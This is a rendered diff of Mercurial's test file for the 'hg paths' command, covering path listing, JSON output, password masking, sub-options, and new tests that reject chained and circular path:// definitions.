3722 # seems to be implemented on most systems.
3708 try:
3723 try:
3709 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3724 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3710 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3725 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3711 return pagesize * pages
3726 return pagesize * pages
3712 except OSError: # sysconf can fail
3727 except OSError: # sysconf can fail
3713 pass
3728 pass
3714 except KeyError: # unknown parameter
3729 except KeyError: # unknown parameter
3715 pass
3730 pass
@@ -1,336 +1,372 b''
1 $ hg init a
1 $ hg init a
2 $ hg clone a b
2 $ hg clone a b
3 updating to branch default
3 updating to branch default
4 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
4 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
5 $ cd a
5 $ cd a
6
6
7 with no paths:
7 with no paths:
8
8
9 $ hg paths
9 $ hg paths
10 $ hg paths unknown
10 $ hg paths unknown
11 not found!
11 not found!
12 [1]
12 [1]
13 $ hg paths -Tjson
13 $ hg paths -Tjson
14 [
14 [
15 ]
15 ]
16
16
17 with paths:
17 with paths:
18
18
19 $ echo '[paths]' >> .hg/hgrc
19 $ echo '[paths]' >> .hg/hgrc
20 $ echo 'dupe = ../b#tip' >> .hg/hgrc
20 $ echo 'dupe = ../b#tip' >> .hg/hgrc
21 $ echo 'expand = $SOMETHING/bar' >> .hg/hgrc
21 $ echo 'expand = $SOMETHING/bar' >> .hg/hgrc
22 $ hg in dupe
22 $ hg in dupe
23 comparing with $TESTTMP/b
23 comparing with $TESTTMP/b
24 no changes found
24 no changes found
25 [1]
25 [1]
26 $ cd ..
26 $ cd ..
27 $ hg -R a in dupe
27 $ hg -R a in dupe
28 comparing with $TESTTMP/b
28 comparing with $TESTTMP/b
29 no changes found
29 no changes found
30 [1]
30 [1]
31 $ cd a
31 $ cd a
32 $ hg paths
32 $ hg paths
33 dupe = $TESTTMP/b#tip
33 dupe = $TESTTMP/b#tip
34 expand = $TESTTMP/a/$SOMETHING/bar
34 expand = $TESTTMP/a/$SOMETHING/bar
35 $ SOMETHING=foo hg paths
35 $ SOMETHING=foo hg paths
36 dupe = $TESTTMP/b#tip
36 dupe = $TESTTMP/b#tip
37 expand = $TESTTMP/a/foo/bar
37 expand = $TESTTMP/a/foo/bar
38 #if msys
38 #if msys
39 $ SOMETHING=//foo hg paths
39 $ SOMETHING=//foo hg paths
40 dupe = $TESTTMP/b#tip
40 dupe = $TESTTMP/b#tip
41 expand = /foo/bar
41 expand = /foo/bar
42 #else
42 #else
43 $ SOMETHING=/foo hg paths
43 $ SOMETHING=/foo hg paths
44 dupe = $TESTTMP/b#tip
44 dupe = $TESTTMP/b#tip
45 expand = /foo/bar
45 expand = /foo/bar
46 #endif
46 #endif
47 $ hg paths -q
47 $ hg paths -q
48 dupe
48 dupe
49 expand
49 expand
50 $ hg paths dupe
50 $ hg paths dupe
51 $TESTTMP/b#tip
51 $TESTTMP/b#tip
52 $ hg paths -q dupe
52 $ hg paths -q dupe
53 $ hg paths unknown
53 $ hg paths unknown
54 not found!
54 not found!
55 [1]
55 [1]
56 $ hg paths -q unknown
56 $ hg paths -q unknown
57 [1]
57 [1]
58
58
59 formatter output with paths:
59 formatter output with paths:
60
60
61 $ echo 'dupe:pushurl = https://example.com/dupe' >> .hg/hgrc
61 $ echo 'dupe:pushurl = https://example.com/dupe' >> .hg/hgrc
62 $ hg paths -Tjson | sed 's|\\\\|\\|g'
62 $ hg paths -Tjson | sed 's|\\\\|\\|g'
63 [
63 [
64 {
64 {
65 "name": "dupe",
65 "name": "dupe",
66 "pushurl": "https://example.com/dupe",
66 "pushurl": "https://example.com/dupe",
67 "url": "$TESTTMP/b#tip"
67 "url": "$TESTTMP/b#tip"
68 },
68 },
69 {
69 {
70 "name": "expand",
70 "name": "expand",
71 "url": "$TESTTMP/a/$SOMETHING/bar"
71 "url": "$TESTTMP/a/$SOMETHING/bar"
72 }
72 }
73 ]
73 ]
74 $ hg paths -Tjson dupe | sed 's|\\\\|\\|g'
74 $ hg paths -Tjson dupe | sed 's|\\\\|\\|g'
75 [
75 [
76 {
76 {
77 "name": "dupe",
77 "name": "dupe",
78 "pushurl": "https://example.com/dupe",
78 "pushurl": "https://example.com/dupe",
79 "url": "$TESTTMP/b#tip"
79 "url": "$TESTTMP/b#tip"
80 }
80 }
81 ]
81 ]
82 $ hg paths -Tjson -q unknown
82 $ hg paths -Tjson -q unknown
83 [
83 [
84 ]
84 ]
85 [1]
85 [1]
86
86
87 log template:
87 log template:
88
88
89 (behaves as a {name: path-string} dict by default)
89 (behaves as a {name: path-string} dict by default)
90
90
91 $ hg log -rnull -T '{peerurls}\n'
91 $ hg log -rnull -T '{peerurls}\n'
92 dupe=$TESTTMP/b#tip expand=$TESTTMP/a/$SOMETHING/bar
92 dupe=$TESTTMP/b#tip expand=$TESTTMP/a/$SOMETHING/bar
93 $ hg log -rnull -T '{join(peerurls, "\n")}\n'
93 $ hg log -rnull -T '{join(peerurls, "\n")}\n'
94 dupe=$TESTTMP/b#tip
94 dupe=$TESTTMP/b#tip
95 expand=$TESTTMP/a/$SOMETHING/bar
95 expand=$TESTTMP/a/$SOMETHING/bar
96 $ hg log -rnull -T '{peerurls % "{name}: {url}\n"}'
96 $ hg log -rnull -T '{peerurls % "{name}: {url}\n"}'
97 dupe: $TESTTMP/b#tip
97 dupe: $TESTTMP/b#tip
98 expand: $TESTTMP/a/$SOMETHING/bar
98 expand: $TESTTMP/a/$SOMETHING/bar
99 $ hg log -rnull -T '{get(peerurls, "dupe")}\n'
99 $ hg log -rnull -T '{get(peerurls, "dupe")}\n'
100 $TESTTMP/b#tip
100 $TESTTMP/b#tip
101
101
102 (sub options can be populated by map/dot operation)
102 (sub options can be populated by map/dot operation)
103
103
104 $ hg log -rnull \
104 $ hg log -rnull \
105 > -T '{get(peerurls, "dupe") % "url: {url}\npushurl: {pushurl}\n"}'
105 > -T '{get(peerurls, "dupe") % "url: {url}\npushurl: {pushurl}\n"}'
106 url: $TESTTMP/b#tip
106 url: $TESTTMP/b#tip
107 pushurl: https://example.com/dupe
107 pushurl: https://example.com/dupe
108 $ hg log -rnull -T '{peerurls.dupe.pushurl}\n'
108 $ hg log -rnull -T '{peerurls.dupe.pushurl}\n'
109 https://example.com/dupe
109 https://example.com/dupe
110
110
111 (in JSON, it's a dict of urls)
111 (in JSON, it's a dict of urls)
112
112
113 $ hg log -rnull -T '{peerurls|json}\n' | sed 's|\\\\|/|g'
113 $ hg log -rnull -T '{peerurls|json}\n' | sed 's|\\\\|/|g'
114 {"dupe": "$TESTTMP/b#tip", "expand": "$TESTTMP/a/$SOMETHING/bar"}
114 {"dupe": "$TESTTMP/b#tip", "expand": "$TESTTMP/a/$SOMETHING/bar"}
115
115
116 password should be masked in plain output, but not in machine-readable/template
116 password should be masked in plain output, but not in machine-readable/template
117 output:
117 output:
118
118
119 $ echo 'insecure = http://foo:insecure@example.com/' >> .hg/hgrc
119 $ echo 'insecure = http://foo:insecure@example.com/' >> .hg/hgrc
120 $ hg paths insecure
120 $ hg paths insecure
121 http://foo:***@example.com/
121 http://foo:***@example.com/
122 $ hg paths -Tjson insecure
122 $ hg paths -Tjson insecure
123 [
123 [
124 {
124 {
125 "name": "insecure",
125 "name": "insecure",
126 "url": "http://foo:insecure@example.com/"
126 "url": "http://foo:insecure@example.com/"
127 }
127 }
128 ]
128 ]
129 $ hg log -rnull -T '{get(peerurls, "insecure")}\n'
129 $ hg log -rnull -T '{get(peerurls, "insecure")}\n'
130 http://foo:insecure@example.com/
130 http://foo:insecure@example.com/
131
131
132 zeroconf wraps ui.configitems(), which shouldn't crash at least:
132 zeroconf wraps ui.configitems(), which shouldn't crash at least:
133
133
134 $ hg paths --config extensions.zeroconf=
134 $ hg paths --config extensions.zeroconf=
135 dupe = $TESTTMP/b#tip
135 dupe = $TESTTMP/b#tip
136 dupe:pushurl = https://example.com/dupe
136 dupe:pushurl = https://example.com/dupe
137 expand = $TESTTMP/a/$SOMETHING/bar
137 expand = $TESTTMP/a/$SOMETHING/bar
138 insecure = http://foo:***@example.com/
138 insecure = http://foo:***@example.com/
139
139
140 $ cd ..
140 $ cd ..
141
141
142 sub-options for an undeclared path are ignored
142 sub-options for an undeclared path are ignored
143
143
144 $ hg init suboptions
144 $ hg init suboptions
145 $ cd suboptions
145 $ cd suboptions
146
146
147 $ cat > .hg/hgrc << EOF
147 $ cat > .hg/hgrc << EOF
148 > [paths]
148 > [paths]
149 > path0 = https://example.com/path0
149 > path0 = https://example.com/path0
150 > path1:pushurl = https://example.com/path1
150 > path1:pushurl = https://example.com/path1
151 > EOF
151 > EOF
152 $ hg paths
152 $ hg paths
153 path0 = https://example.com/path0
153 path0 = https://example.com/path0
154
154
155 unknown sub-options aren't displayed
155 unknown sub-options aren't displayed
156
156
157 $ cat > .hg/hgrc << EOF
157 $ cat > .hg/hgrc << EOF
158 > [paths]
158 > [paths]
159 > path0 = https://example.com/path0
159 > path0 = https://example.com/path0
160 > path0:foo = https://example.com/path1
160 > path0:foo = https://example.com/path1
161 > EOF
161 > EOF
162
162
163 $ hg paths
163 $ hg paths
164 path0 = https://example.com/path0
164 path0 = https://example.com/path0
165
165
166 :pushurl must be a URL
166 :pushurl must be a URL
167
167
168 $ cat > .hg/hgrc << EOF
168 $ cat > .hg/hgrc << EOF
169 > [paths]
169 > [paths]
170 > default = /path/to/nothing
170 > default = /path/to/nothing
171 > default:pushurl = /not/a/url
171 > default:pushurl = /not/a/url
172 > EOF
172 > EOF
173
173
174 $ hg paths
174 $ hg paths
175 (paths.default:pushurl not a URL; ignoring)
175 (paths.default:pushurl not a URL; ignoring)
176 default = /path/to/nothing
176 default = /path/to/nothing
177
177
178 #fragment is not allowed in :pushurl
178 #fragment is not allowed in :pushurl
179
179
180 $ cat > .hg/hgrc << EOF
180 $ cat > .hg/hgrc << EOF
181 > [paths]
181 > [paths]
182 > default = https://example.com/repo
182 > default = https://example.com/repo
183 > invalid = https://example.com/repo
183 > invalid = https://example.com/repo
184 > invalid:pushurl = https://example.com/repo#branch
184 > invalid:pushurl = https://example.com/repo#branch
185 > EOF
185 > EOF
186
186
187 $ hg paths
187 $ hg paths
188 ("#fragment" in paths.invalid:pushurl not supported; ignoring)
188 ("#fragment" in paths.invalid:pushurl not supported; ignoring)
189 default = https://example.com/repo
189 default = https://example.com/repo
190 invalid = https://example.com/repo
190 invalid = https://example.com/repo
191 invalid:pushurl = https://example.com/repo
191 invalid:pushurl = https://example.com/repo
192
192
193 $ cd ..
193 $ cd ..
194
194
195 'file:' disables [paths] entries for clone destination
195 'file:' disables [paths] entries for clone destination
196
196
197 $ cat >> $HGRCPATH <<EOF
197 $ cat >> $HGRCPATH <<EOF
198 > [paths]
198 > [paths]
199 > gpath1 = http://hg.example.com
199 > gpath1 = http://hg.example.com
200 > EOF
200 > EOF
201
201
202 $ hg clone a gpath1
202 $ hg clone a gpath1
203 abort: cannot create new http repository
203 abort: cannot create new http repository
204 [255]
204 [255]
205
205
206 $ hg clone a file:gpath1
206 $ hg clone a file:gpath1
207 updating to branch default
207 updating to branch default
208 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
208 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
209 $ cd gpath1
209 $ cd gpath1
210 $ hg -q id
210 $ hg -q id
211 000000000000
211 000000000000
212
212
213 $ cd ..
213 $ cd ..
214
214
215 Testing path referencing other paths
215 Testing path referencing other paths
216 ====================================
216 ====================================
217
217
218 basic setup
218 basic setup
219 -----------
219 -----------
220
220
221 $ ls -1
221 $ ls -1
222 a
222 a
223 b
223 b
224 gpath1
224 gpath1
225 suboptions
225 suboptions
226 $ hg init chained_path
226 $ hg init chained_path
227 $ cd chained_path
227 $ cd chained_path
228 $ cat << EOF > .hg/hgrc
228 $ cat << EOF > .hg/hgrc
229 > [paths]
229 > [paths]
230 > default=../a
230 > default=../a
231 > other_default=path://default
231 > other_default=path://default
232 > path_with_branch=../branchy#foo
232 > path_with_branch=../branchy#foo
233 > other_branch=path://path_with_branch
233 > other_branch=path://path_with_branch
234 > other_branched=path://path_with_branch#default
234 > other_branched=path://path_with_branch#default
235 > pushdest=../push-dest
235 > pushdest=../push-dest
236 > pushdest:pushrev=default
236 > pushdest:pushrev=default
237 > pushdest2=path://pushdest
237 > pushdest2=path://pushdest
238 > pushdest-overwrite=path://pushdest
238 > pushdest-overwrite=path://pushdest
239 > pushdest-overwrite:pushrev=foo
239 > pushdest-overwrite:pushrev=foo
240 > EOF
240 > EOF
241
241
242 $ hg init ../branchy
242 $ hg init ../branchy
243 $ hg init ../push-dest
243 $ hg init ../push-dest
244 $ hg debugbuilddag -R ../branchy '.:base+3<base@foo+5'
244 $ hg debugbuilddag -R ../branchy '.:base+3<base@foo+5'
245 $ hg log -G -T '{branch}\n' -R ../branchy
245 $ hg log -G -T '{branch}\n' -R ../branchy
246 o foo
246 o foo
247 |
247 |
248 o foo
248 o foo
249 |
249 |
250 o foo
250 o foo
251 |
251 |
252 o foo
252 o foo
253 |
253 |
254 o foo
254 o foo
255 |
255 |
256 | o default
256 | o default
257 | |
257 | |
258 | o default
258 | o default
259 | |
259 | |
260 | o default
260 | o default
261 |/
261 |/
262 o default
262 o default
263
263
264
264
265 $ hg paths
265 $ hg paths
266 default = $TESTTMP/a
266 default = $TESTTMP/a
267 gpath1 = http://hg.example.com/
267 gpath1 = http://hg.example.com/
268 other_branch = $TESTTMP/branchy#foo
268 other_branch = $TESTTMP/branchy#foo
269 other_branched = $TESTTMP/branchy#default
269 other_branched = $TESTTMP/branchy#default
270 other_default = $TESTTMP/a
270 other_default = $TESTTMP/a
271 path_with_branch = $TESTTMP/branchy#foo
271 path_with_branch = $TESTTMP/branchy#foo
272 pushdest = $TESTTMP/push-dest
272 pushdest = $TESTTMP/push-dest
273 pushdest:pushrev = default
273 pushdest:pushrev = default
274 pushdest-overwrite = $TESTTMP/push-dest
274 pushdest-overwrite = $TESTTMP/push-dest
275 pushdest-overwrite:pushrev = foo
275 pushdest-overwrite:pushrev = foo
276 pushdest2 = $TESTTMP/push-dest
276 pushdest2 = $TESTTMP/push-dest
277 pushdest2:pushrev = default
277 pushdest2:pushrev = default
278
278
279 test basic chaining
279 test basic chaining
280 -------------------
280 -------------------
281
281
282 $ hg path other_default
282 $ hg path other_default
283 $TESTTMP/a
283 $TESTTMP/a
284 $ hg pull default
284 $ hg pull default
285 pulling from $TESTTMP/a
285 pulling from $TESTTMP/a
286 no changes found
286 no changes found
287 $ hg pull other_default
287 $ hg pull other_default
288 pulling from $TESTTMP/a
288 pulling from $TESTTMP/a
289 no changes found
289 no changes found
290
290
291 test inheritance of the #fragment part
291 test inheritance of the #fragment part
292 --------------------------------------
292 --------------------------------------
293
293
294 $ hg pull path_with_branch
294 $ hg pull path_with_branch
295 pulling from $TESTTMP/branchy
295 pulling from $TESTTMP/branchy
296 adding changesets
296 adding changesets
297 adding manifests
297 adding manifests
298 adding file changes
298 adding file changes
299 added 6 changesets with 0 changes to 0 files
299 added 6 changesets with 0 changes to 0 files
300 new changesets 1ea73414a91b:bcebb50b77de
300 new changesets 1ea73414a91b:bcebb50b77de
301 (run 'hg update' to get a working copy)
301 (run 'hg update' to get a working copy)
302 $ hg pull other_branch
302 $ hg pull other_branch
303 pulling from $TESTTMP/branchy
303 pulling from $TESTTMP/branchy
304 no changes found
304 no changes found
305 $ hg pull other_branched
305 $ hg pull other_branched
306 pulling from $TESTTMP/branchy
306 pulling from $TESTTMP/branchy
307 searching for changes
307 searching for changes
308 adding changesets
308 adding changesets
309 adding manifests
309 adding manifests
310 adding file changes
310 adding file changes
311 added 3 changesets with 0 changes to 0 files (+1 heads)
311 added 3 changesets with 0 changes to 0 files (+1 heads)
312 new changesets 66f7d451a68b:2dc09a01254d
312 new changesets 66f7d451a68b:2dc09a01254d
313 (run 'hg heads' to see heads)
313 (run 'hg heads' to see heads)
314
314
315 test inheritance of the suboptions
315 test inheritance of the suboptions
316 ----------------------------------
316 ----------------------------------
317
317
318 $ hg push pushdest
318 $ hg push pushdest
319 pushing to $TESTTMP/push-dest
319 pushing to $TESTTMP/push-dest
320 searching for changes
320 searching for changes
321 adding changesets
321 adding changesets
322 adding manifests
322 adding manifests
323 adding file changes
323 adding file changes
324 added 4 changesets with 0 changes to 0 files
324 added 4 changesets with 0 changes to 0 files
325 $ hg push pushdest2
325 $ hg push pushdest2
326 pushing to $TESTTMP/push-dest
326 pushing to $TESTTMP/push-dest
327 searching for changes
327 searching for changes
328 no changes found
328 no changes found
329 [1]
329 [1]
330 $ hg push pushdest-overwrite --new-branch
330 $ hg push pushdest-overwrite --new-branch
331 pushing to $TESTTMP/push-dest
331 pushing to $TESTTMP/push-dest
332 searching for changes
332 searching for changes
333 adding changesets
333 adding changesets
334 adding manifests
334 adding manifests
335 adding file changes
335 adding file changes
336 added 5 changesets with 0 changes to 0 files (+1 heads)
336 added 5 changesets with 0 changes to 0 files (+1 heads)
337
338 Test chaining path:// definition
339 --------------------------------
340
341 This is currently unsupported, but feel free to implement the necessary
342 dependency detection.
343
344 $ cat << EOF >> .hg/hgrc
345 > chain_path=path://other_default
346 > EOF
347
348 $ hg id
349 000000000000
350 $ hg path
351 abort: cannot use `path://other_default`, "other_default" is also define as a `path://`
352 [255]
353 $ hg pull chain_path
354 abort: cannot use `path://other_default`, "other_default" is also define as a `path://`
355 [255]
356
357 Doing an actual circle should always be an issue
358
359 $ cat << EOF >> .hg/hgrc
360 > rock=path://cissors
361 > cissors=path://paper
362 > paper=://rock
363 > EOF
364
365 $ hg id
366 000000000000
367 $ hg path
368 abort: cannot use `path://other_default`, "other_default" is also define as a `path://`
369 [255]
370 $ hg pull chain_path
371 abort: cannot use `path://other_default`, "other_default" is also define as a `path://`
372 [255]
General Comments 0
You need to be logged in to leave comments. Login now